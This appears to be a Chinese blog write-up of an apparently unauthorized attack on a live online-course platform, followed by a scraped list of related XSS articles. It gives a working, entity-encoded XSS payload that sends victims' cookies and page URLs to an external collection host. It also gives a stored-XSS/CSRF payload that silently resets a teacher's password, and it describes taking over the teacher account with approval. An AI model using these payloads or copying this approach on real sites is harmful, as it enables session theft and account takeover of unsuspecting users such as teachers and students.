ctf xss利用_Csrf+Xss组合拳
本文首发于“合天智汇”公众号,作者: 影子
各位大师傅,第一次在合天发文章,请多多关照
今年年初的疫情确实有点突然,打乱了上半年的所有计划(本来是校内大佬带我拿奖的时刻,没了
,学长毕业了,就剩下我这个小垃圾带着下一届去搞ctf了,难啊,难啊)
- 0x01
这个站是我疫情时候在线上网课的平台,本着对信息安全做贡献的目的下去做的这个渗透工作(咳咳,这个平台有个签到,每次签到我都在与大脑作斗争,最后争不过大脑,选择了睡觉,最后旷课太多,不搞要挂科。)
- 0x02
这个站简单的先用手机看了下,这种网课站我感觉xss比较好寻找一些,所以我找到的都是一些存储型xss,
先看一下第一个基本没鸟用的xss
用户个人资料处
更改姓名
Payload为<script>alert()</script>
(这个地方字数有限制,最长为24个字符)
保存,刷新页面
成功显示弹窗
经测试
1.学号
2.身份
3.学校
4.姓名处均存在存储型xss并能够弹窗
确实这个地方感觉确实没什么用,字数有限制,顶多就是在老师打开页面的时候弹出一个弹框,没鸟用啊,回头想想自己旷课的次数,md,拼了
- 0x03
发布新话题
测试发现
将上面全部代码进行复制
在下面编辑框中进行黏贴,直接解析为html
内容处可以执行html代码
测试发布时
发布后访问此话题
成功xss
进行下一步测试
进行获取cookies
在<script src=””>
这个payload无法执行
不知道是服务器问题还是什么
换用其他payload
in_str = "(function(){(new Image()).src='http://xss.buuoj.cn/index.php?do=api&id=Mli4D9&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();if(''==1){keep=new Image();keep.src='http://xss.buuoj.cn/index.php?do=keepsession&id=Mli4D9&url='+escape(document.location)+'&cookie='+escape(document.cookie)};"
output = "" for c in in_str: output += "&#" + str(ord(c))print("<svg><script>eval("" + output + "")</script>")
payload为
在进行测试
<svg><script>eval("(function(){(new Image()).src='http://xss.buuoj.cn/index.php?do=api&id=Mli4D9&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();if(''==1){keep=new Image();keep.src='http://xss.buuoj.cn/index.php?do=keepsession&id=Mli4D9&url='+escape(document.location)+'&cookie='+escape(document.cookie)};")</script>
看看xss平台
成功获取
也可以使用其他的利用方法
跳转钓鱼网站
在页面内这是html表单进行钓鱼
或者js挂马等等
严重程度
中危
But。。
部分Cookeis设置了http-only,拿不到老师的全部cookie。
- 0x04
继续测试
更改密码处没有验证原先密码
根据前面找到的xss构建payload
```
<script type="text/javascript" src="http://admin.3cjz.cn/include/jQ.js"></script><script> function loginSubmit() { $.ajax({url: "https://www.xxxxxxxx.com/UserApi/updatePassword", type: "post", data: {"newpassword": "123456789"},dataType: "json", success: function (data) {if (data.status == "1") {} else { } }, }); }
loginSubmit()
</script>
```
那么要去受害者要有兴趣去访问这个payload
作业处,受害者(例如老师,获取更大权限)老师要去更改作业
找到在作业留言处存在存储型xss
在此处插入payload
查看效果
现在密码为123456789
登录正常
将payload的密码改为123456789.
我用的手机端(pc端似乎要抓包,懒)
提交成功
教师端进入批阅
老师的管理界面
教师端进入批阅
抓包看到
访问时,直接更新了密码
退出
密码为12345679时错误
密码为123456789.时成功
更改密码处存在csrf
联想到刚刚的存储型xss,
一个csrf+xss的组合拳漏洞
- 0x05
最后到底有没有拿到老师权限呢
最高星星数6个
怕被发现。
真带劲
哈哈
搞完手工,打包提交,以上漏洞至今为止已修复。
声明:作者初衷用于分享与普及网络知识,若读者因此作出任何危害网络安全行为后果自负,与合天智汇及原作者无关。
实验推荐
DoraBox之CSRF
https://www.hetianlab.com/expc.do?ec=ECID6f07-3348-4d8f-90a1-2b399f28378b
(通过DoraBox靶场系列闯关练习,理解跨站请求伪造漏洞的原理与利用过程。)
ctf xss利用_Csrf+Xss组合拳相关推荐
- php反射型xss,利用反射型XSS漏洞,模拟获取登录账户的Cookie
目录结构 一.测试环境 二.测试目标 三.原理描述 四.操作步骤 1.在服务器上搭建并启用hacker测试网站 2.在服务器上测试站点根目录内创建一个存放攻击脚本的文件夹 3.在xss文件夹下创建攻击 ...
- ctf xss利用_CTF XSS
CTF XSS 这一块接触的不多,这次先当搬运工,之后慢慢补上自己的东西 渗透流程 fuzz "' '";!-=#$%^&{()} 绕过 标签之间 先闭合标签 JS标签内 ...
- url存在宽字节跨站漏洞_【XSS漏洞】XSS漏洞相关总结v1.0
点击上方"公众号" 可以订阅哦! Hello,各位小伙伴周五晚上好~ 终于到了XSS漏洞的完结篇啦~~ 感觉本公众号写的最多的就是XSS,现在可以告一段落了... 让我们来看看第一 ...
- XSS绕过,XSS过滤速查,XSS绕过姿势
1.介绍 这篇文章的主要目的是给专业安全测试人员提供一份跨站脚本漏洞检测指南.文章的初始内容是由RSnake提供给 OWASP,内容基于他的XSS备忘录:http://ha.ckers.org/xss ...
- 关于xss盲打关于xss盲打
关于xss盲打关于xss盲打 又到了各种年终总结的时候了,先祝各位看官"圣诞快乐".我记得有朋友问我在2012年里有没有"猥琐流"比较出彩的东西时,我给的答案是 ...
- xss漏洞之——XSS平台搭建
前言 经过测试,如果发现了XSS漏洞,那么我们可以结合一些XSS工具来进行利用.常见的XSS利用工具有下面几个: 1.kali下的beef (1)kali命令行里输入beef-xss,得到一个脚本 & ...
- 【应用安全之xss二】xss攻击介绍和防范(前端)
本文我们会讲解 XSS ,主要包括: XSS 攻击的介绍 XSS 攻击的分类 XSS 攻击的预防和检测 XSS 攻击的总结 XSS 攻击案例 XSS 攻击的介绍 在开始本文之前,我们先提出一个问题,请 ...
- 反射型XSS,存储型XSS,Dom型XSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录
XSS: 反射型XSS,存储型XSS,Dom型XSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录 一.跨站脚本漏洞(XSS) XSS漏洞一直被评估为web漏洞中危害较大的漏洞 XSS是一种发 ...
- 【Web安全】XSS简介与XSS测试平台截取用户COOKIE的探索
文章目录 1 XSS简介 2 XSS分类 3 XSS原理演示 4 XSS测试平台使用 4.1 指引文档 4.2 勾选默认模块测试成功的返回值 1 XSS简介 百度百科的解释: XSS又叫CSS (Cr ...
- Java SSM框架+jsp处理存储型XSS和反射型XSS漏洞
关于存储型XSS和反射型XSS漏洞的修复 *这里是java中SSM框架,前端页面为JSP,仅在服务端做处理,思路是对脚本转义* 存储型XSS漏洞 1:表现形式 2:解决方式 第一步:创建过滤器XssR ...
最新文章
- 倒置函数reverse的用法
- 微软:超过96%的企业用户正在测试Win10
- python编程快速上手_给Python小白推荐的40本入门书籍,帮你快速上手
- 程序员真的只能干到35岁?——我的35岁危机度过之道!
- 想安装一套监控,流程是什么?费用多少?
- 索引书单(持续更新中)
- Android进程与内存及内存泄露
- 一道面试题:遇到大规模Oracle坏块该怎么处理?
- 台湾php解谜游戏,米诺陶(Minotaur):赛博朋克点击式解谜冒险类游戏
- html斜删除线怎么设置,html如何设置加粗、倾斜、下划线、删除线等字体效果
- 股票交易数据接口是什么?
- did拼接屏最小拼缝0.88mm
- 眼睛容易干燥疲劳怎么办?
- Oracle获取拼音简码
- 计算机科学的稿费有多少,写作近两年,稿费3000+,老实人告诉你为什么那么多人写作能月入30000...
- 直播新秀之微信小程序直播
- 安装thrift错误的处理方法
- 腾讯股票实时数据接口
- 什么才算是关键指标?如何选择关键指标? by彭文华
- 《Adobe Illustrator CS5中文版经典教程》—第0课0.15节创建和编辑渐变
热门文章
- 9.高性能MySQL --- 操作系统和硬件优化
- 147. class_exists()
- 50. 模型层 --- dao 层(2)
- 1.Ubuntu Server下搭建LAMP环境
- java 设置sesion 生命周期
- springboot实现xml传参和返回值
- django应用之corsheaders[跨域设置]
- 堆中的路径(MOOC)
- pta Percolate Up and Down(最小堆的插入维护和删除维护)
- Centos7搭建kubernetes搭建